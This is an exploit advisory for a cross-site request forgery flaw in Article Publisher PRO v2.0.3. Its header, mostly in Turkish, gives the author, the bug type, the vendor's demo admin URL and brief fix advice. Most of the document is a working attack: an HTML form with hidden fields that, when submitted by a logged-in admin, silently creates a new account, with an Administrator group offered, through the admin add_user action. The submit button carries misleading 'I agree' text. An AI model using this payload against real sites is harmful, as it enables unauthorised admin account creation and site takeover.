< ------------------- header data start ------------------- >

#############################################################

# author : CWOmer

# Script Name : Article Publisher PRO v2.0.3

# Bug Type : XSRF-CSRF

# Infection : Admin Sifresi Deistirilebilir.

# Demo Script : http://demo-article-publisher-pro.phparticlescript.com/admin/

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form method=post action=http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php?action=add_user_query enctype=multipart/form-data>
<input type=hidden name=a_username value=AdminDeneme>
<input type=hidden name=a_pass1 value=AdminDeneme>
<input type=hidden name=a_pass2 value=AdminDeneme>
<input type=hidden name=a_email value=AdminDeneme>
<select name=’a_group’><option value=’1’>Administrator</option><option value=’2’>Visitor</option><option value=’3’>Writer</option><option value=’4’>Banned</option></select>
<input type=submit value=I agree, continue registration>
</form>

< -- bug code end of -- >